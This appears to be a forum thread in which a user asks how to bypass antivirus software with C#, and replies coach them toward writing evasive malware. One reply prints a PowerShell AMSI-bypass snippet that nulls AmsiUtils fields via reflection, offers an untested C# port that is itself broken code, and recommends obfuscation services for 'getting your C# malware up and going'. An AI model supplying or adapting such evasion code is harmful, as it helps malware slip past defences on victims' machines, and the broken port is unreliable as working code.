How to bypass anti-viruses with C#? How to learn?

Hello everyone, I am learning C# because I want to bypass anti-viruses with C#. But I don’t know how to learn this knowledge about bypassing anti-viruses with C#.

Hey!!
Well, I’d recommend you first understand the AVs, then learn some basic C#. One of the things about evading AV is understanding what is being detected.

You don’t need to write in C, but this is a good read on understanding why the methods work

The following link has references and ideas on how to execute shellcode in your C# malware

This is a simple C# malware that injects and executes shellcode

If you look at how other researchers use different methods to execute their malware, you can get an idea of how to write your own. Evasion is usually stuff like changing variable names, removing comments, different methods of execution, size, flow of execution, obfuscation. You can use these terms to research methods of evading AV, as they are used in different places (Go, PowerShell, C, F#, etc.)

Good Luck!


Hey @pryoc110. It should be noted that the C# programming language may not be the best for developing malware to evade antivirus. Microsoft recently integrated their anti-malware scan interface with the .NET framework (Ashcraft, 2019), so in my non-expert opinion, only use C# AV avoidance techniques if you’re up for a good challenge — especially if you’re going to use the assembly in a real life situation!

But if you really want to try to evade antivirus with a .NET assembly written in C#, I was able to find a few interesting projects and research that might be able to help you. Chandel (2022) discusses seven different techniques for bypassing the AMSI service. They’re mostly applied to PowerShell, but I do think that with a bit of creativity, you can implement them in C#.

For example, consider this snippet in Chandel’s article:

$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)

[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)

This is referencing a function called amsiInitFailed() and trying to set it to true so as to “trick,” for lack of a better term, the interface into not scanning the assembly in question. Here is a simple PowerShell-to-C# pseudo-port that I whipped up (which I didn’t bother to test; I’ll leave that up to you ;-):

using System;
using System.Reflection;
using System.Runtime.InteropServices;

public class Programme {
    public static void Main(string[] args) {
        var mem = Marshal.AllocHGlobal(9076);
        Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue(null, null);
        Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue(null, (IntPtr)mem);
    }
}

There are also websites like amsi.fail that take in (specifically PowerShell) code and obfuscate and mangle it to the point that AMSI gets too confused and doesn’t recognise the malicious nature of the thing. I do recommend using these as a starting point for getting your C# malware up and going :smiley:

That’s awesome! I’m going to learn these great projects and knowledge. :smile: